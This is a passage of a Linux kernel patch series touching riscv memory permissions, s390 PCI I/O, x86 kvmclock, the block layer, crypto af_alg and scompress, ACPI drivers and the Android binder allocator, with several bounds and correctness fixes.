++	do {
++		next = pmd_addr_end(vaddr, end);
++
++		if (next - vaddr >= PMD_SIZE &&
++		    vaddr <= (vaddr & PMD_MASK) && end >= next)
++			continue;
++
++		if (pmd_leaf(*pmdp)) {
++			struct page *pte_page;
++			unsigned long pfn = _pmd_pfn(*pmdp);
++			pgprot_t prot = __pgprot(pmd_val(*pmdp) & ~_PAGE_PFN_MASK);
++			pte_t *ptep_new;
++			int i;
++
++			pte_page = alloc_page(GFP_KERNEL);
++			if (!pte_page)
++				return -ENOMEM;
++
++			ptep_new = (pte_t *)page_address(pte_page);
++			for (i = 0; i < PTRS_PER_PTE; ++i, ++ptep_new)
++				set_pte(ptep_new, pfn_pte(pfn + i, prot));
++
++			smp_wmb();
++
++			set_pmd(pmdp, pfn_pmd(page_to_pfn(pte_page), PAGE_TABLE));
++		}
++	} while (pmdp++, vaddr = next, vaddr != end);
++
++	return 0;
++}
++
++static int __split_linear_mapping_pud(p4d_t *p4dp,
++				      unsigned long vaddr, unsigned long end)
++{
++	pud_t *pudp;
++	unsigned long next;
++	int ret;
++
++	pudp = pud_offset(p4dp, vaddr);
++
++	do {
++		next = pud_addr_end(vaddr, end);
++
++		if (next - vaddr >= PUD_SIZE &&
++		    vaddr <= (vaddr & PUD_MASK) && end >= next)
++			continue;
++
++		if (pud_leaf(*pudp)) {
++			struct page *pmd_page;
++			unsigned long pfn = _pud_pfn(*pudp);
++			pgprot_t prot = __pgprot(pud_val(*pudp) & ~_PAGE_PFN_MASK);
++			pmd_t *pmdp_new;
++			int i;
++
++			pmd_page = alloc_page(GFP_KERNEL);
++			if (!pmd_page)
++				return -ENOMEM;
++
++			pmdp_new = (pmd_t *)page_address(pmd_page);
++			for (i = 0; i < PTRS_PER_PMD; ++i, ++pmdp_new)
++				set_pmd(pmdp_new,
++					pfn_pmd(pfn + ((i * PMD_SIZE) >> PAGE_SHIFT), prot));
++
++			smp_wmb();
++
++			set_pud(pudp, pfn_pud(page_to_pfn(pmd_page), PAGE_TABLE));
++		}
++
++		ret = __split_linear_mapping_pmd(pudp, vaddr, next);
++		if (ret)
++			return ret;
++	} while (pudp++, vaddr = next, vaddr != end);
++
++	return 0;
++}
++
++static int __split_linear_mapping_p4d(pgd_t *pgdp,
++				      unsigned long vaddr, unsigned long end)
++{
++	p4d_t *p4dp;
++	unsigned long next;
++	int ret;
++
++	p4dp = p4d_offset(pgdp, vaddr);
++
++	do {
++		next = p4d_addr_end(vaddr, end);
++
++		/*
++		 * If [vaddr; end] contains [vaddr & P4D_MASK; next], we don't
++		 * need to split, we'll change the protections on the whole P4D.
++		 */
++		if (next - vaddr >= P4D_SIZE &&
++		    vaddr <= (vaddr & P4D_MASK) && end >= next)
++			continue;
++
++		if (p4d_leaf(*p4dp)) {
++			struct page *pud_page;
++			unsigned long pfn = _p4d_pfn(*p4dp);
++			pgprot_t prot = __pgprot(p4d_val(*p4dp) & ~_PAGE_PFN_MASK);
++			pud_t *pudp_new;
++			int i;
++
++			pud_page = alloc_page(GFP_KERNEL);
++			if (!pud_page)
++				return -ENOMEM;
++
++			/*
++			 * Fill the pud level with leaf puds that have the same
++			 * protections as the leaf p4d.
++			 */
++			pudp_new = (pud_t *)page_address(pud_page);
++			for (i = 0; i < PTRS_PER_PUD; ++i, ++pudp_new)
++				set_pud(pudp_new,
++					pfn_pud(pfn + ((i * PUD_SIZE) >> PAGE_SHIFT), prot));
++
++			/*
++			 * Make sure the pud filling is not reordered with the
++			 * p4d store which could result in seeing a partially
++			 * filled pud level.
++			 */
++			smp_wmb();
++
++			set_p4d(p4dp, pfn_p4d(page_to_pfn(pud_page), PAGE_TABLE));
++		}
++
++		ret = __split_linear_mapping_pud(p4dp, vaddr, next);
++		if (ret)
++			return ret;
++	} while (p4dp++, vaddr = next, vaddr != end);
++
++	return 0;
++}
++
++static int __split_linear_mapping_pgd(pgd_t *pgdp,
++				      unsigned long vaddr,
++				      unsigned long end)
++{
++	unsigned long next;
++	int ret;
++
++	do {
++		next = pgd_addr_end(vaddr, end);
++		/* We never use PGD mappings for the linear mapping */
++		ret = __split_linear_mapping_p4d(pgdp, vaddr, next);
++		if (ret)
++			return ret;
++	} while (pgdp++, vaddr = next, vaddr != end);
++
++	return 0;
++}
++
++static int split_linear_mapping(unsigned long start, unsigned long end)
++{
++	return __split_linear_mapping_pgd(pgd_offset_k(start), start, end);
++}
++#endif	/* CONFIG_64BIT */
++
+ static int __set_memory(unsigned long addr, int numpages, pgprot_t set_mask,
+ 			pgprot_t clear_mask)
+ {
+ 	int ret;
+ 	unsigned long start = addr;
+ 	unsigned long end = start + PAGE_SIZE * numpages;
++	unsigned long __maybe_unused lm_start;
++	unsigned long __maybe_unused lm_end;
+ 	struct pageattr_masks masks = {
+ 		.set_mask = set_mask,
+ 		.clear_mask = clear_mask
+@@ -119,11 +275,72 @@ static int __set_memory(unsigned long addr, int numpages, pgprot_t set_mask,
+ 		return 0;
+ 
+ 	mmap_write_lock(&init_mm);
++
++#ifdef CONFIG_64BIT
++	/*
++	 * We are about to change the permissions of a kernel mapping, we must
++	 * apply the same changes to its linear mapping alias, which may imply
++	 * splitting a huge mapping.
++	 */
++
++	if (is_vmalloc_or_module_addr((void *)start)) {
++		struct vm_struct *area = NULL;
++		int i, page_start;
++
++		area = find_vm_area((void *)start);
++		page_start = (start - (unsigned long)area->addr) >> PAGE_SHIFT;
++
++		for (i = page_start; i < page_start + numpages; ++i) {
++			lm_start = (unsigned long)page_address(area->pages[i]);
++			lm_end = lm_start + PAGE_SIZE;
++
++			ret = split_linear_mapping(lm_start, lm_end);
++			if (ret)
++				goto unlock;
++
++			ret = walk_page_range_novma(&init_mm, lm_start, lm_end,
++						    &pageattr_ops, NULL, &masks);
++			if (ret)
++				goto unlock;
++		}
++	} else if (is_kernel_mapping(start) || is_linear_mapping(start)) {
++		if (is_kernel_mapping(start)) {
++			lm_start = (unsigned long)lm_alias(start);
++			lm_end = (unsigned long)lm_alias(end);
++		} else {
++			lm_start = start;
++			lm_end = end;
++		}
++
++		ret = split_linear_mapping(lm_start, lm_end);
++		if (ret)
++			goto unlock;
++
++		ret = walk_page_range_novma(&init_mm, lm_start, lm_end,
++					    &pageattr_ops, NULL, &masks);
++		if (ret)
++			goto unlock;
++	}
++
+ 	ret =  walk_page_range_novma(&init_mm, start, end, &pageattr_ops, NULL,
+ 				     &masks);
++
++unlock:
++	mmap_write_unlock(&init_mm);
++
++	/*
++	 * We can't use flush_tlb_kernel_range() here as we may have split a
++	 * hugepage that is larger than that, so let's flush everything.
++	 */
++	flush_tlb_all();
++#else
++	ret =  walk_page_range_novma(&init_mm, start, end, &pageattr_ops, NULL,
++				     &masks);
++
+ 	mmap_write_unlock(&init_mm);
+ 
+ 	flush_tlb_kernel_range(start, end);
++#endif
+ 
+ 	return ret;
+ }
+@@ -158,36 +375,14 @@ int set_memory_nx(unsigned long addr, int numpages)
+ 
+ int set_direct_map_invalid_noflush(struct page *page)
+ {
+-	int ret;
+-	unsigned long start = (unsigned long)page_address(page);
+-	unsigned long end = start + PAGE_SIZE;
+-	struct pageattr_masks masks = {
+-		.set_mask = __pgprot(0),
+-		.clear_mask = __pgprot(_PAGE_PRESENT)
+-	};
+-
+-	mmap_read_lock(&init_mm);
+-	ret = walk_page_range(&init_mm, start, end, &pageattr_ops, &masks);
+-	mmap_read_unlock(&init_mm);
+-
+-	return ret;
++	return __set_memory((unsigned long)page_address(page), 1,
++			    __pgprot(0), __pgprot(_PAGE_PRESENT));
+ }
+ 
+ int set_direct_map_default_noflush(struct page *page)
+ {
+-	int ret;
+-	unsigned long start = (unsigned long)page_address(page);
+-	unsigned long end = start + PAGE_SIZE;
+-	struct pageattr_masks masks = {
+-		.set_mask = PAGE_KERNEL,
+-		.clear_mask = __pgprot(0)
+-	};
+-
+-	mmap_read_lock(&init_mm);
+-	ret = walk_page_range(&init_mm, start, end, &pageattr_ops, &masks);
+-	mmap_read_unlock(&init_mm);
+-
+-	return ret;
++	return __set_memory((unsigned long)page_address(page), 1,
++			    PAGE_KERNEL, __pgprot(_PAGE_EXEC));
+ }
+ 
+ #ifdef CONFIG_DEBUG_PAGEALLOC
+diff --git a/arch/s390/include/asm/pci_io.h b/arch/s390/include/asm/pci_io.h
+index 287bb88f76986..2686bee800e3d 100644
+--- a/arch/s390/include/asm/pci_io.h
++++ b/arch/s390/include/asm/pci_io.h
+@@ -11,6 +11,8 @@
+ /* I/O size constraints */
+ #define ZPCI_MAX_READ_SIZE	8
+ #define ZPCI_MAX_WRITE_SIZE	128
++#define ZPCI_BOUNDARY_SIZE	(1 << 12)
++#define ZPCI_BOUNDARY_MASK	(ZPCI_BOUNDARY_SIZE - 1)
+ 
+ /* I/O Map */
+ #define ZPCI_IOMAP_SHIFT		48
+@@ -125,16 +127,18 @@ out:
+ int zpci_write_block(volatile void __iomem *dst, const void *src,
+ 		     unsigned long len);
+ 
+-static inline u8 zpci_get_max_write_size(u64 src, u64 dst, int len, int max)
++static inline int zpci_get_max_io_size(u64 src, u64 dst, int len, int max)
+ {
+-	int count = len > max ? max : len, size = 1;
++	int offset = dst & ZPCI_BOUNDARY_MASK;
++	int size;
+ 
+-	while (!(src & 0x1) && !(dst & 0x1) && ((size << 1) <= count)) {
+-		dst = dst >> 1;
+-		src = src >> 1;
+-		size = size << 1;
+-	}
+-	return size;
++	size = min3(len, ZPCI_BOUNDARY_SIZE - offset, max);
++	if (IS_ALIGNED(src, 8) && IS_ALIGNED(dst, 8) && IS_ALIGNED(size, 8))
++		return size;
++
++	if (size >= 8)
++		return 8;
++	return rounddown_pow_of_two(size);
+ }
+ 
+ static inline int zpci_memcpy_fromio(void *dst,
+@@ -144,9 +148,9 @@ static inline int zpci_memcpy_fromio(void *dst,
+ 	int size, rc = 0;
+ 
+ 	while (n > 0) {
+-		size = zpci_get_max_write_size((u64 __force) src,
+-					       (u64) dst, n,
+-					       ZPCI_MAX_READ_SIZE);
++		size = zpci_get_max_io_size((u64 __force) src,
++					    (u64) dst, n,
++					    ZPCI_MAX_READ_SIZE);
+ 		rc = zpci_read_single(dst, src, size);
+ 		if (rc)
+ 			break;
+@@ -166,9 +170,9 @@ static inline int zpci_memcpy_toio(volatile void __iomem *dst,
+ 		return -EINVAL;
+ 
+ 	while (n > 0) {
+-		size = zpci_get_max_write_size((u64 __force) dst,
+-					       (u64) src, n,
+-					       ZPCI_MAX_WRITE_SIZE);
++		size = zpci_get_max_io_size((u64 __force) dst,
++					    (u64) src, n,
++					    ZPCI_MAX_WRITE_SIZE);
+ 		if (size > 8) /* main path */
+ 			rc = zpci_write_block(dst, src, size);
+ 		else
+diff --git a/arch/s390/pci/pci_mmio.c b/arch/s390/pci/pci_mmio.c
+index 5880893329310..a90499c087f0c 100644
+--- a/arch/s390/pci/pci_mmio.c
++++ b/arch/s390/pci/pci_mmio.c
+@@ -97,9 +97,9 @@ static inline int __memcpy_toio_inuser(void __iomem *dst,
+ 		return -EINVAL;
+ 
+ 	while (n > 0) {
+-		size = zpci_get_max_write_size((u64 __force) dst,
+-					       (u64 __force) src, n,
+-					       ZPCI_MAX_WRITE_SIZE);
++		size = zpci_get_max_io_size((u64 __force) dst,
++					    (u64 __force) src, n,
++					    ZPCI_MAX_WRITE_SIZE);
+ 		if (size > 8) /* main path */
+ 			rc = __pcistb_mio_inuser(dst, src, size, &status);
+ 		else
+@@ -242,9 +242,9 @@ static inline int __memcpy_fromio_inuser(void __user *dst,
+ 	u8 status;
+ 
+ 	while (n > 0) {
+-		size = zpci_get_max_write_size((u64 __force) src,
+-					       (u64 __force) dst, n,
+-					       ZPCI_MAX_READ_SIZE);
++		size = zpci_get_max_io_size((u64 __force) src,
++					    (u64 __force) dst, n,
++					    ZPCI_MAX_READ_SIZE);
+ 		rc = __pcilg_mio_inuser(dst, src, size, &status);
+ 		if (rc)
+ 			break;
+diff --git a/arch/x86/kernel/cpu/mce/inject.c b/arch/x86/kernel/cpu/mce/inject.c
+index 12cf2e7ca33cc..87c15ab896517 100644
+--- a/arch/x86/kernel/cpu/mce/inject.c
++++ b/arch/x86/kernel/cpu/mce/inject.c
+@@ -747,6 +747,7 @@ static void check_hw_inj_possible(void)
+ 
+ 		wrmsrl_safe(mca_msr_reg(bank, MCA_STATUS), status);
+ 		rdmsrl_safe(mca_msr_reg(bank, MCA_STATUS), &status);
++		wrmsrl_safe(mca_msr_reg(bank, MCA_STATUS), 0);
+ 
+ 		if (!status) {
+ 			hw_injection_possible = false;
+diff --git a/arch/x86/kernel/kvmclock.c b/arch/x86/kernel/kvmclock.c
+index 16333ba1904ba..c067887d42df5 100644
+--- a/arch/x86/kernel/kvmclock.c
++++ b/arch/x86/kernel/kvmclock.c
+@@ -24,8 +24,8 @@
+ 
+ static int kvmclock __initdata = 1;
+ static int kvmclock_vsyscall __initdata = 1;
+-static int msr_kvm_system_time __ro_after_init = MSR_KVM_SYSTEM_TIME;
+-static int msr_kvm_wall_clock __ro_after_init = MSR_KVM_WALL_CLOCK;
++static int msr_kvm_system_time __ro_after_init;
++static int msr_kvm_wall_clock __ro_after_init;
+ static u64 kvm_sched_clock_offset __ro_after_init;
+ 
+ static int __init parse_no_kvmclock(char *arg)
+@@ -195,7 +195,8 @@ static void kvm_setup_secondary_clock(void)
+ 
+ void kvmclock_disable(void)
+ {
+-	native_write_msr(msr_kvm_system_time, 0, 0);
++	if (msr_kvm_system_time)
++		native_write_msr(msr_kvm_system_time, 0, 0);
+ }
+ 
+ static void __init kvmclock_init_mem(void)
+@@ -294,7 +295,10 @@ void __init kvmclock_init(void)
+ 	if (kvm_para_has_feature(KVM_FEATURE_CLOCKSOURCE2)) {
+ 		msr_kvm_system_time = MSR_KVM_SYSTEM_TIME_NEW;
+ 		msr_kvm_wall_clock = MSR_KVM_WALL_CLOCK_NEW;
+-	} else if (!kvm_para_has_feature(KVM_FEATURE_CLOCKSOURCE)) {
++	} else if (kvm_para_has_feature(KVM_FEATURE_CLOCKSOURCE)) {
++		msr_kvm_system_time = MSR_KVM_SYSTEM_TIME;
++		msr_kvm_wall_clock = MSR_KVM_WALL_CLOCK;
++	} else {
+ 		return;
+ 	}
+ 
+diff --git a/arch/x86/lib/misc.c b/arch/x86/lib/misc.c
+index a018ec4fba53e..c97be9a1430a0 100644
+--- a/arch/x86/lib/misc.c
++++ b/arch/x86/lib/misc.c
+@@ -6,7 +6,7 @@
+  */
+ int num_digits(int val)
+ {
+-	int m = 10;
++	long long m = 10;
+ 	int d = 1;
+ 
+ 	if (val < 0) {
+diff --git a/block/bio.c b/block/bio.c
+index 9ec72a78f1149..6c22dd7b6f278 100644
+--- a/block/bio.c
++++ b/block/bio.c
+@@ -1109,13 +1109,22 @@ bool bio_add_folio(struct bio *bio, struct folio *folio, size_t len,
+ 
+ void __bio_release_pages(struct bio *bio, bool mark_dirty)
+ {
+-	struct bvec_iter_all iter_all;
+-	struct bio_vec *bvec;
++	struct folio_iter fi;
+ 
+-	bio_for_each_segment_all(bvec, bio, iter_all) {
+-		if (mark_dirty && !PageCompound(bvec->bv_page))
+-			set_page_dirty_lock(bvec->bv_page);
+-		put_page(bvec->bv_page);
++	bio_for_each_folio_all(fi, bio) {
++		struct page *page;
++		size_t done = 0;
++
++		if (mark_dirty) {
++			folio_lock(fi.folio);
++			folio_mark_dirty(fi.folio);
++			folio_unlock(fi.folio);
++		}
++		page = folio_page(fi.folio, fi.offset / PAGE_SIZE);
++		do {
++			folio_put(fi.folio);
++			done += PAGE_SIZE;
++		} while (done < fi.length);
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(__bio_release_pages);
+@@ -1414,12 +1423,12 @@ EXPORT_SYMBOL(bio_free_pages);
+  */
+ void bio_set_pages_dirty(struct bio *bio)
+ {
+-	struct bio_vec *bvec;
+-	struct bvec_iter_all iter_all;
++	struct folio_iter fi;
+ 
+-	bio_for_each_segment_all(bvec, bio, iter_all) {
+-		if (!PageCompound(bvec->bv_page))
+-			set_page_dirty_lock(bvec->bv_page);
++	bio_for_each_folio_all(fi, bio) {
++		folio_lock(fi.folio);
++		folio_mark_dirty(fi.folio);
++		folio_unlock(fi.folio);
+ 	}
+ }
+ 
+@@ -1462,12 +1471,11 @@ static void bio_dirty_fn(struct work_struct *work)
+ 
+ void bio_check_pages_dirty(struct bio *bio)
+ {
+-	struct bio_vec *bvec;
++	struct folio_iter fi;
+ 	unsigned long flags;
+-	struct bvec_iter_all iter_all;
+ 
+-	bio_for_each_segment_all(bvec, bio, iter_all) {
+-		if (!PageDirty(bvec->bv_page) && !PageCompound(bvec->bv_page))
++	bio_for_each_folio_all(fi, bio) {
++		if (!folio_test_dirty(fi.folio))
+ 			goto defer;
+ 	}
+ 
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 368f1947c8956..b3f99dda45300 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -2946,12 +2946,6 @@ void blk_mq_submit_bio(struct bio *bio)
+ 	blk_status_t ret;
+ 
+ 	bio = blk_queue_bounce(bio, q);
+-	if (bio_may_exceed_limits(bio, &q->limits)) {
+-		bio = __bio_split_to_limits(bio, &q->limits, &nr_segs);
+-		if (!bio)
+-			return;
+-	}
+-
+ 	bio_set_ioprio(bio);
+ 
+ 	if (plug) {
+@@ -2960,6 +2954,11 @@ void blk_mq_submit_bio(struct bio *bio)
+ 			rq = NULL;
+ 	}
+ 	if (rq) {
++		if (unlikely(bio_may_exceed_limits(bio, &q->limits))) {
++			bio = __bio_split_to_limits(bio, &q->limits, &nr_segs);
++			if (!bio)
++				return;
++		}
+ 		if (!bio_integrity_prep(bio))
+ 			return;
+ 		if (blk_mq_attempt_bio_merge(q, bio, nr_segs))
+@@ -2970,6 +2969,11 @@ void blk_mq_submit_bio(struct bio *bio)
+ 	} else {
+ 		if (unlikely(bio_queue_enter(bio)))
+ 			return;
++		if (unlikely(bio_may_exceed_limits(bio, &q->limits))) {
++			bio = __bio_split_to_limits(bio, &q->limits, &nr_segs);
++			if (!bio)
++				goto fail;
++		}
+ 		if (!bio_integrity_prep(bio))
+ 			goto fail;
+ 	}
+diff --git a/block/blk-settings.c b/block/blk-settings.c
+index 86ff375c00ce4..bbca4ce77a2d3 100644
+--- a/block/blk-settings.c
++++ b/block/blk-settings.c
+@@ -135,7 +135,7 @@ void blk_queue_max_hw_sectors(struct request_queue *q, unsigned int max_hw_secto
+ 	limits->max_hw_sectors = max_hw_sectors;
+ 
+ 	max_sectors = min_not_zero(max_hw_sectors, limits->max_dev_sectors);
+-	max_sectors = min_t(unsigned int, max_sectors, BLK_DEF_MAX_SECTORS);
++	max_sectors = min(max_sectors, BLK_DEF_MAX_SECTORS);
+ 	max_sectors = round_down(max_sectors,
+ 				 limits->logical_block_size >> SECTOR_SHIFT);
+ 	limits->max_sectors = max_sectors;
+diff --git a/block/genhd.c b/block/genhd.c
+index afab646d12c85..ddb17c4adc8a2 100644
+--- a/block/genhd.c
++++ b/block/genhd.c
+@@ -444,7 +444,9 @@ int __must_check device_add_disk(struct device *parent, struct gendisk *disk,
+ 				DISK_MAX_PARTS);
+ 			disk->minors = DISK_MAX_PARTS;
+ 		}
+-		if (disk->first_minor + disk->minors > MINORMASK + 1)
++		if (disk->first_minor > MINORMASK ||
++		    disk->minors > MINORMASK + 1 ||
++		    disk->first_minor + disk->minors > MINORMASK + 1)
+ 			goto out_exit_elevator;
+ 	} else {
+ 		if (WARN_ON(disk->minors))
+@@ -567,6 +569,7 @@ out_del_integrity:
+ out_del_block_link:
+ 	if (!sysfs_deprecated)
+ 		sysfs_remove_link(block_depr, dev_name(ddev));
++	pm_runtime_set_memalloc_noio(ddev, false);
+ out_device_del:
+ 	device_del(ddev);
+ out_free_ext_minor:
+diff --git a/block/ioctl.c b/block/ioctl.c
+index 3c475e4166e9f..ebe4a2653622b 100644
+--- a/block/ioctl.c
++++ b/block/ioctl.c
+@@ -18,7 +18,7 @@ static int blkpg_do_ioctl(struct block_device *bdev,
+ {
+ 	struct gendisk *disk = bdev->bd_disk;
+ 	struct blkpg_partition p;
+-	long long start, length;
++	sector_t start, length;
+ 
+ 	if (disk->flags & GENHD_FL_NO_PART)
+ 		return -EINVAL;
+@@ -35,14 +35,17 @@ static int blkpg_do_ioctl(struct block_device *bdev,
+ 	if (op == BLKPG_DEL_PARTITION)
+ 		return bdev_del_partition(disk, p.pno);
+ 
++	if (p.start < 0 || p.length <= 0 || p.start + p.length < 0)
++		return -EINVAL;
++	/* Check that the partition is aligned to the block size */
++	if (!IS_ALIGNED(p.start | p.length, bdev_logical_block_size(bdev)))
++		return -EINVAL;
++
+ 	start = p.start >> SECTOR_SHIFT;
+ 	length = p.length >> SECTOR_SHIFT;
+ 
+ 	switch (op) {
+ 	case BLKPG_ADD_PARTITION:
+-		/* check if partition is aligned to blocksize */
+-		if (p.start & (bdev_logical_block_size(bdev) - 1))
+-			return -EINVAL;
+ 		return bdev_add_partition(disk, p.pno, start, length);
+ 	case BLKPG_RESIZE_PARTITION:
+ 		return bdev_resize_partition(disk, p.pno, start, length);
+diff --git a/crypto/af_alg.c b/crypto/af_alg.c
+index e893c0f6c8799..fef69d2a6b183 100644
+--- a/crypto/af_alg.c
++++ b/crypto/af_alg.c
+@@ -1045,9 +1045,13 @@ EXPORT_SYMBOL_GPL(af_alg_sendpage);
+ void af_alg_free_resources(struct af_alg_async_req *areq)
+ {
+ 	struct sock *sk = areq->sk;
++	struct af_alg_ctx *ctx;
+ 
+ 	af_alg_free_areq_sgls(areq);
+ 	sock_kfree_s(sk, areq, areq->areqlen);
++
++	ctx = alg_sk(sk)->private;
++	ctx->inflight = false;
+ }
+ EXPORT_SYMBOL_GPL(af_alg_free_resources);
+ 
+@@ -1117,11 +1121,19 @@ EXPORT_SYMBOL_GPL(af_alg_poll);
+ struct af_alg_async_req *af_alg_alloc_areq(struct sock *sk,
+ 					   unsigned int areqlen)
+ {
+-	struct af_alg_async_req *areq = sock_kmalloc(sk, areqlen, GFP_KERNEL);
++	struct af_alg_ctx *ctx = alg_sk(sk)->private;
++	struct af_alg_async_req *areq;
++
++	/* Only one AIO request can be in flight. */
++	if (ctx->inflight)
++		return ERR_PTR(-EBUSY);
+ 
++	areq = sock_kmalloc(sk, areqlen, GFP_KERNEL);
+ 	if (unlikely(!areq))
+ 		return ERR_PTR(-ENOMEM);
+ 
++	ctx->inflight = true;
++
+ 	areq->areqlen = areqlen;
+ 	areq->sk = sk;
+ 	areq->last_rsgl = NULL;
+diff --git a/crypto/scompress.c b/crypto/scompress.c
+index 738f4f8f0f41a..4d6366a444007 100644
+--- a/crypto/scompress.c
++++ b/crypto/scompress.c
+@@ -124,6 +124,7 @@ static int scomp_acomp_comp_decomp(struct acomp_req *req, int dir)
+ 	struct crypto_scomp *scomp = *tfm_ctx;
+ 	void **ctx = acomp_request_ctx(req);
+ 	struct scomp_scratch *scratch;
++	unsigned int dlen;
+ 	int ret;
+ 
+ 	if (!req->src || !req->slen || req->slen > SCOMP_SCRATCH_SIZE)
+@@ -135,6 +136,8 @@ static int scomp_acomp_comp_decomp(struct acomp_req *req, int dir)
+ 	if (!req->dlen || req->dlen > SCOMP_SCRATCH_SIZE)
+ 		req->dlen = SCOMP_SCRATCH_SIZE;
+ 
++	dlen = req->dlen;
++
+ 	scratch = raw_cpu_ptr(&scomp_scratch);
+ 	spin_lock(&scratch->lock);
+ 
+@@ -152,6 +155,9 @@ static int scomp_acomp_comp_decomp(struct acomp_req *req, int dir)
+ 				ret = -ENOMEM;
+ 				goto out;
+ 			}
++		} else if (req->dlen > dlen) {
++			ret = -ENOSPC;
++			goto out;
+ 		}
+ 		scatterwalk_map_and_copy(scratch->dst, req->dst, 0, req->dlen,
+ 					 1);
+diff --git a/drivers/acpi/acpi_extlog.c b/drivers/acpi/acpi_extlog.c
+index e648158368a7d..088db2356998f 100644
+--- a/drivers/acpi/acpi_extlog.c
++++ b/drivers/acpi/acpi_extlog.c
+@@ -145,9 +145,14 @@ static int extlog_print(struct notifier_block *nb, unsigned long val,
+ 	static u32 err_seq;
+ 
+ 	estatus = extlog_elog_entry_check(cpu, bank);
+-	if (estatus == NULL || (mce->kflags & MCE_HANDLED_CEC))
++	if (!estatus)
+ 		return NOTIFY_DONE;
+ 
++	if (mce->kflags & MCE_HANDLED_CEC) {
++		estatus->block_status = 0;
++		return NOTIFY_DONE;
++	}
++
+ 	memcpy(elog_buf, (void *)estatus, ELOG_ENTRY_LEN);
+ 	/* clear record status to enable BIOS to update it again */
+ 	estatus->block_status = 0;
+diff --git a/drivers/acpi/acpi_lpit.c b/drivers/acpi/acpi_lpit.c
+index 50540d4d4948e..2c015ecf71853 100644
+--- a/drivers/acpi/acpi_lpit.c
++++ b/drivers/acpi/acpi_lpit.c
+@@ -98,7 +98,7 @@ static void lpit_update_residency(struct lpit_residency_info *info,
+ 				 struct acpi_lpit_native *lpit_native)
+ {
+ 	info->frequency = lpit_native->counter_frequency ?
+-				lpit_native->counter_frequency : tsc_khz * 1000;
++				lpit_native->counter_frequency : mul_u32_u32(tsc_khz, 1000U);
+ 	if (!info->frequency)
+ 		info->frequency = 1;
+ 
+diff --git a/drivers/acpi/acpi_lpss.c b/drivers/acpi/acpi_lpss.c
+index f08ffa75f4a76..8b44743945c8b 100644
+--- a/drivers/acpi/acpi_lpss.c
++++ b/drivers/acpi/acpi_lpss.c
+@@ -450,8 +450,9 @@ static int register_device_clock(struct acpi_device *adev,
+ 		if (!clk_name)
+ 			return -ENOMEM;
+ 		clk = clk_register_fractional_divider(NULL, clk_name, parent,
++						      0, prv_base, 1, 15, 16, 15,
+ 						      CLK_FRAC_DIVIDER_POWER_OF_TWO_PS,
+-						      prv_base, 1, 15, 16, 15, 0, NULL);
++						      NULL);
+ 		parent = clk_name;
+ 
+ 		clk_name = kasprintf(GFP_KERNEL, "%s-update", devname);
+diff --git a/drivers/acpi/acpi_video.c b/drivers/acpi/acpi_video.c
+index ed318485eb192..f7852fb75ab39 100644
+--- a/drivers/acpi/acpi_video.c
++++ b/drivers/acpi/acpi_video.c
+@@ -1726,12 +1726,12 @@ static void acpi_video_dev_register_backlight(struct acpi_video_device *device)
+ 		return;
+ 	count++;
+ 
+-	acpi_get_parent(device->dev->handle, &acpi_parent);
+-
+-	pdev = acpi_get_pci_dev(acpi_parent);
+-	if (pdev) {
+-		parent = &pdev->dev;
+-		pci_dev_put(pdev);
++	if (ACPI_SUCCESS(acpi_get_parent(device->dev->handle, &acpi_parent))) {
++		pdev = acpi_get_pci_dev(acpi_parent);
++		if (pdev) {
++			parent = &pdev->dev;
++			pci_dev_put(pdev);
++		}
+ 	}
+ 
+ 	memset(&props, 0, sizeof(struct backlight_properties));
+diff --git a/drivers/acpi/property.c b/drivers/acpi/property.c
+index 0565c18c2ee31..62aee900af3df 100644
+--- a/drivers/acpi/property.c
++++ b/drivers/acpi/property.c
+@@ -851,6 +851,7 @@ static int acpi_get_ref_args(struct fwnode_reference_args *args,
+  * @index: Index of the reference to return
+  * @num_args: Maximum number of arguments after each reference
+  * @args: Location to store the returned reference with optional arguments
++ *	  (may be NULL)
+  *
+  * Find property with @name, verifify that it is a package containing at least
+  * one object reference and if so, store the ACPI device object pointer to the
+@@ -907,6 +908,9 @@ int __acpi_node_get_property_reference(const struct fwnode_handle *fwnode,
+ 		if (!device)
+ 			return -EINVAL;
+ 
++		if (!args)
++			return 0;
++
+ 		args->fwnode = acpi_fwnode_handle(device);
+ 		args->nargs = 0;
+ 		return 0;
+diff --git a/drivers/android/binder_alloc.c b/drivers/android/binder_alloc.c
+index ed607850f87fb..fcbb750b1ccc3 100644
+--- a/drivers/android/binder_alloc.c
++++ b/drivers/android/binder_alloc.c
+@@ -271,7 +271,7 @@ static int binder_update_page_range(struct binder_alloc *alloc, int allocate,
+ 	}
+ 	if (mm) {
+ 		mmap_write_unlock(mm);
+-		mmput(mm);
++		mmput_async(mm);
+ 	}
+ 	return 0;
+ 
+@@ -304,7 +304,7 @@ err_page_ptr_cleared:
+ err_no_vma:
+ 	if (mm) {
+ 		mmap_write_unlock(mm);
+-		mmput(mm);
++		mmput_async(mm);
+ 	}
+ 	return vma ? -ENOMEM : -ESRCH;
+ }
+@@ -344,8 +344,7 @@ static bool debug_low_async_space_locked(struct binder_alloc *alloc, int pid)
+ 			continue;
+ 		if (!buffer->async_transaction)
+ 			continue;
+-		total_alloc_size += binder_alloc_buffer_size(alloc, buffer)
+-			+ sizeof(struct binder_buffer);
++		total_alloc_size += binder_alloc_buffer_size(alloc, buffer);
+ 		num_buffers++;
+ 	}
+ 
+@@ -407,17 +406,17 @@ static struct binder_buffer *binder_alloc_new_buf_locked(
+ 				alloc->pid, extra_buffers_size);
+ 		return ERR_PTR(-EINVAL);
+ 	}
+-	if (is_async &&
+-	    alloc->free_async_space < size + sizeof(struct binder_buffer)) {
++
++	/* Pad 0-size buffers so they get assigned unique addresses */
++	size = max(size, sizeof(void *));
++
++	if (is_async && alloc->free_async_space < size) {
+ 		binder_alloc_debug(BINDER_DEBUG_BUFFER_ALLOC,
+ 			     "%d: binder_alloc_buf size %zd failed, no async space left\n",
+ 			      alloc->pid, size);
+ 		return ERR_PTR(-ENOSPC);
+ 	}
+ 
+-	/* Pad 0-size buffers so they get assigned unique addresses */
+-	size = max(size, sizeof(void *));
+-
+ 	while (n) {
+ 		buffer = rb_entry(n, struct binder_buffer, rb_node);
+ 		BUG_ON(!buffer->free);
+@@ -519,7 +518,7 @@ static struct binder_buffer *binder_alloc_new_buf_locked(
+ 	buffer->pid = pid;
+ 	buffer->oneway_spam_suspect = false;
+ 	if (is_async) {
+-		alloc->free_async_space -= size + sizeof(struct binder_buffer);
++		alloc->free_async_space -= size;
